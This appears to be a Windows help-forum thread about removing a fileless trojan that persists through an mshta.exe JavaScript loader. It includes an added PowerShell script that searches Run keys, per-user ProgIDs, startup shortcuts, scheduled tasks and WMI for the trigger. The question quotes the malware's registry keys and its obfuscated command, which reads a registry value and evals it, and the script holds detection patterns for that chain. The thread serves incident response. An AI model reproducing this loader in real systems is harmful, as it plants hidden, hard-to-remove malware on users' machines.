Source of script error Error: invalid root in registry key "HKCU\software\ydwarldiy\zujmvfhc".

    Question

  • Trojan infection was mitigated through the employment of Sysinternals. Source of trojan infection was a fake Chrome emergency update post. Use of Sysinternals and a W7 bootstick allowed for the removal of most of the infection.

    Original infection keys and file removed

    [HKEY_USERS\S-1-5-21-1232934697-1086943095-315576832-55753\Software\Classes\c31796]

    [HKEY_USERS\S-1-5-21-1232934697-1086943095-315576832-55753\Software\Classes\c31796\shell]

    [HKEY_USERS\S-1-5-21-1232934697-1086943095-315576832-55753\Software\Classes\c31796\shell\open]

    [HKEY_USERS\S-1-5-21-1232934697-1086943095-315576832-55753\Software\Classes\c31796\shell\open\command]
    @="\"C:\\Windows\\system32\\mshta.exe\" \"javascript:i9KIFxNK=\"S\";u5W9=new ActiveXObject(\"WScript.Shell\");xxFwDLW1=\"83lvZdZJ\";HdP0t=u5W9.RegRead(\"HKCU\\\\software\\\\ydwarldiy\\\\zujmvfhc\");wu5Uwrzh=\"Qd07LlR\";eval(HdP0t);gY6bZRg=\"aB8l\";\""

    -----------------------------------------------------------------------

    Persistent script error still occurs. Have sourced it to mshta.exe. Image file is verified as Microsoft, version 11.0.9600.16428. Command line seems to be the culprit: C:\Windows\System32\mshta.exe" javascript:DPHB4C0="98sQmHed";v22t=new%20ActiveXObject("WScript.Shell");Dr1JH6E="zlYd";f58vmO=v22t.RegRead("HKCU\\software\\ydwarldiy\\zujmvfhc");PpoQ6="ISftyd";eval(f58vmO);biRVr0uH="Az";

    Autostart location

    HKCU\Software\Microsoft\Windows\CurrentVersion\Run\(Default)

    comes up empty.

    Ran a Procmon boot log but did not find anything more in it that would produce the command-line call-out. How can this be efficiently and correctly found?

    Friday, July 22, 2016 11:52 PM
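The post shows the two halves of a fileless persistence chain: a per-user ProgID under HKCU\Software\Classes whose open command launches mshta.exe, and a script body stored in the registry value HKCU\software\ydwarldiy\zujmvfhc that the mshta JavaScript reads and eval()s. What is missing is the trigger that opens that ProgID, which in this pattern is usually a named Run value or a Startup-folder shortcut pointing at a file whose random extension is mapped to the ProgID, so the (Default) value under Run being empty proves little. The hunt script below is an added example written for this thread, not something posted by the original author or shipped with Sysinternals. It assumes an elevated PowerShell session on the affected machine, run as the infected user so that HKCU: is the S-1-5-21-... hive quoted above; the only key taken from the post is ydwarldiy\zujmvfhc, every other location is a generic autostart source.

```powershell
# Added hunt script, not from the original post. Assumes an elevated PowerShell
# session on the affected machine, run as the infected user so HKCU: maps to the
# S-1-5-21-... hive shown in the post. Only ydwarldiy\zujmvfhc comes from the
# post; the other keys are generic autostart locations.
$Pattern = 'mshta|javascript:|RegRead|ActiveXObject|eval\('

function Test-Suspicious([string]$Text) { return ($Text -match $Pattern) }

# Helper: read a key's values as name/value pairs, dropping PowerShell's PS* noise
function Get-RegValues([string]$Key) {
    if (-not (Test-Path $Key)) { return }
    (Get-ItemProperty -Path $Key).PSObject.Properties |
        Where-Object { $_.Name -notlike 'PS*' }
}

# 1. Run/RunOnce in both hives. A named value is the usual trigger, so the empty
#    (Default) value the post mentions says nothing by itself.
$runKeys = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
           'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
           'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
           'HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'
foreach ($k in $runKeys) {
    foreach ($v in Get-RegValues $k) {
        if (Test-Suspicious "$($v.Value)") { "[Run] $k\$($v.Name) = $($v.Value)" }
    }
}

# 2. Per-user ProgIDs (the post's c31796 key) and the extensions mapped to them.
#    Any file with a mapped extension is a trigger, so the shortcut or Run entry
#    that opens such a file is the missing autostart.
$classes    = 'HKCU:\Software\Classes'
$badProgIds = @()
$badExts    = @()
foreach ($sub in Get-ChildItem -Path $classes -ErrorAction SilentlyContinue) {
    $cmdKey = "$classes\$($sub.PSChildName)\shell\open\command"
    if (Test-Path $cmdKey) {
        $cmd = (Get-ItemProperty -Path $cmdKey).'(default)'
        if (Test-Suspicious "$cmd") {
            $badProgIds += $sub.PSChildName
            "[ProgID] $($sub.PSChildName) -> $cmd"
        }
    }
}
foreach ($ext in Get-ChildItem -Path $classes -ErrorAction SilentlyContinue |
                 Where-Object { $_.PSChildName -like '.*' }) {
    $progId = (Get-ItemProperty -Path "$classes\$($ext.PSChildName)").'(default)'
    if ($badProgIds -contains $progId) {
        $badExts += $ext.PSChildName
        "[Extension] $($ext.PSChildName) -> $progId"
    }
}

# 3. Startup-folder shortcuts: flag suspicious target/arguments, or a target whose
#    extension is one of the hijacked ones found in step 2.
$shell   = New-Object -ComObject WScript.Shell
$startup = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup",
           "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
foreach ($lnk in Get-ChildItem -Path $startup -Filter *.lnk -ErrorAction SilentlyContinue) {
    $sc  = $shell.CreateShortcut($lnk.FullName)
    $ext = [System.IO.Path]::GetExtension($sc.TargetPath)
    if (($badExts -contains $ext) -or (Test-Suspicious "$($sc.TargetPath) $($sc.Arguments)")) {
        "[Shortcut] $($lnk.FullName) -> $($sc.TargetPath) $($sc.Arguments)"
    }
}

# 4. Scheduled tasks via schtasks, which also works on Windows 7 where
#    Get-ScheduledTask does not exist.
schtasks /query /fo CSV /v 2>$null | ConvertFrom-Csv |
    Where-Object { Test-Suspicious "$($_.'Task To Run')" } |
    ForEach-Object { "[Task] $($_.TaskName) -> $($_.'Task To Run')" }

# 5. WMI permanent event subscriptions (command-line and script consumers).
Get-WmiObject -Namespace root\subscription -Class __EventConsumer -ErrorAction SilentlyContinue |
    ForEach-Object {
        $body = "$($_.CommandLineTemplate) $($_.ScriptText)"
        if (Test-Suspicious $body) { "[WMI] $($_.Name) -> $body" }
    }

# 6. Record the stored payload the mshta script reads (value names and sizes only,
#    for the incident notes; the key name is the one quoted in the post).
foreach ($v in Get-RegValues 'HKCU:\Software\ydwarldiy') {
    "[Payload] ydwarldiy\$($v.Name): $("$($v.Value)".Length) chars"
}
```

Whatever the script flags, the Procmon boot log can confirm the chain: filter on Process Name is mshta.exe, then open Tools > Process Tree to see the parent that spawned it (explorer.exe for a shortcut or Run entry, a svchost/taskeng lineage for a scheduled task). Remove the trigger, the ProgID/extension pair and the ydwarldiy key together; leaving any one of them behind is enough for the script error to come back.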
